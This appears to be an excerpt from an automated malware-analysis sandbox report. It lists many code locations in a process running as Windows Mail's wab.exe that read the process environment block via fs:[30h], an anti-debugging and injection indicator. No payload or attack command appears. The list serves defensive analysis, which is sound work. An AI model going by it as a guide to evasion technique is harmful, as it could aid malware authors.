          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D34C mov eax, dword ptr fs:[00000030h]15_2_23B2D34C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D34C mov eax, dword ptr fs:[00000030h]15_2_23B2D34C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB92BC mov eax, dword ptr fs:[00000030h]15_2_23BB92BC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB92BC mov eax, dword ptr fs:[00000030h]15_2_23BB92BC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB92BC mov ecx, dword ptr fs:[00000030h]15_2_23BB92BC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB92BC mov ecx, dword ptr fs:[00000030h]15_2_23BB92BC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402A0 mov eax, dword ptr fs:[00000030h]15_2_23B402A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402A0 mov eax, dword ptr fs:[00000030h]15_2_23B402A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h]15_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h]15_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h]15_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h]15_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov ecx, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC72A0 mov eax, dword ptr fs:[00000030h]15_2_23BC72A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC72A0 mov eax, dword ptr fs:[00000030h]15_2_23BC72A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C052E2 mov eax, dword ptr fs:[00000030h]15_2_23C052E2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6329E mov eax, dword ptr fs:[00000030h]15_2_23B6329E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6329E mov eax, dword ptr fs:[00000030h]15_2_23B6329E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6E284 mov eax, dword ptr fs:[00000030h]15_2_23B6E284
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6E284 mov eax, dword ptr fs:[00000030h]15_2_23B6E284
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h]15_2_23BB0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h]15_2_23BB0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h]15_2_23BB0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05283 mov eax, dword ptr fs:[00000030h]15_2_23C05283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF2F8 mov eax, dword ptr fs:[00000030h]15_2_23BEF2F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B292FF mov eax, dword ptr fs:[00000030h]15_2_23B292FF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h]15_2_23B402E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h]15_2_23B402E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h]15_2_23B402E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h]15_2_23B2B2D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h]15_2_23B2B2D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h]15_2_23B2B2D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5F2D0 mov eax, dword ptr fs:[00000030h]15_2_23B5F2D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5F2D0 mov eax, dword ptr fs:[00000030h]15_2_23B5F2D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B392C5 mov eax, dword ptr fs:[00000030h]15_2_23B392C5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B392C5 mov eax, dword ptr fs:[00000030h]15_2_23B392C5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2823B mov eax, dword ptr fs:[00000030h]15_2_23B2823B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B67208 mov eax, dword ptr fs:[00000030h]15_2_23B67208
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B67208 mov eax, dword ptr fs:[00000030h]15_2_23B67208
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B59274 mov eax, dword ptr fs:[00000030h]15_2_23B59274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B71270 mov eax, dword ptr fs:[00000030h]15_2_23B71270
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B71270 mov eax, dword ptr fs:[00000030h]15_2_23B71270
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h]15_2_23B34260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h]15_2_23B34260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h]15_2_23B34260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFD26B mov eax, dword ptr fs:[00000030h]15_2_23BFD26B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFD26B mov eax, dword ptr fs:[00000030h]15_2_23BFD26B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2826B mov eax, dword ptr fs:[00000030h]15_2_23B2826B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A250 mov eax, dword ptr fs:[00000030h]15_2_23B2A250
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05227 mov eax, dword ptr fs:[00000030h]15_2_23C05227
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEB256 mov eax, dword ptr fs:[00000030h]15_2_23BEB256
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEB256 mov eax, dword ptr fs:[00000030h]15_2_23BEB256
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B36259 mov eax, dword ptr fs:[00000030h]15_2_23B36259
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29240 mov eax, dword ptr fs:[00000030h]15_2_23B29240
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29240 mov eax, dword ptr fs:[00000030h]15_2_23B29240
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6724D mov eax, dword ptr fs:[00000030h]15_2_23B6724D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4B1B0 mov eax, dword ptr fs:[00000030h]15_2_23B4B1B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C051CB mov eax, dword ptr fs:[00000030h]15_2_23C051CB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h]15_2_23B2A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h]15_2_23B2A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h]15_2_23B2A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C061E5 mov eax, dword ptr fs:[00000030h]15_2_23C061E5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B87190 mov eax, dword ptr fs:[00000030h]15_2_23B87190
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B70185 mov eax, dword ptr fs:[00000030h]15_2_23B70185
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEC188 mov eax, dword ptr fs:[00000030h]15_2_23BEC188
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEC188 mov eax, dword ptr fs:[00000030h]15_2_23BEC188
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BD71F9 mov esi, dword ptr fs:[00000030h]15_2_23BD71F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B601F8 mov eax, dword ptr fs:[00000030h]15_2_23B601F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B351ED mov eax, dword ptr fs:[00000030h]15_2_23B351ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6D1D0 mov eax, dword ptr fs:[00000030h]15_2_23B6D1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6D1D0 mov ecx, dword ptr fs:[00000030h]15_2_23B6D1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov ecx, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF61C3 mov eax, dword ptr fs:[00000030h]15_2_23BF61C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF61C3 mov eax, dword ptr fs:[00000030h]15_2_23BF61C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B31131 mov eax, dword ptr fs:[00000030h]15_2_23B31131
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B31131 mov eax, dword ptr fs:[00000030h]15_2_23B31131
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05152 mov eax, dword ptr fs:[00000030h]15_2_23C05152
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B60124 mov eax, dword ptr fs:[00000030h]15_2_23B60124
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov ecx, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF0115 mov eax, dword ptr fs:[00000030h]15_2_23BF0115
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC9179 mov eax, dword ptr fs:[00000030h]15_2_23BC9179
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B37152 mov eax, dword ptr fs:[00000030h]15_2_23B37152
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2C156 mov eax, dword ptr fs:[00000030h]15_2_23B2C156
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC8158 mov eax, dword ptr fs:[00000030h]15_2_23BC8158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B36154 mov eax, dword ptr fs:[00000030h]15_2_23B36154
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B36154 mov eax, dword ptr fs:[00000030h]15_2_23B36154
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov ecx, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF60B8 mov eax, dword ptr fs:[00000030h]15_2_23BF60B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF60B8 mov ecx, dword ptr fs:[00000030h]15_2_23BF60B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C050D9 mov eax, dword ptr fs:[00000030h]15_2_23C050D9
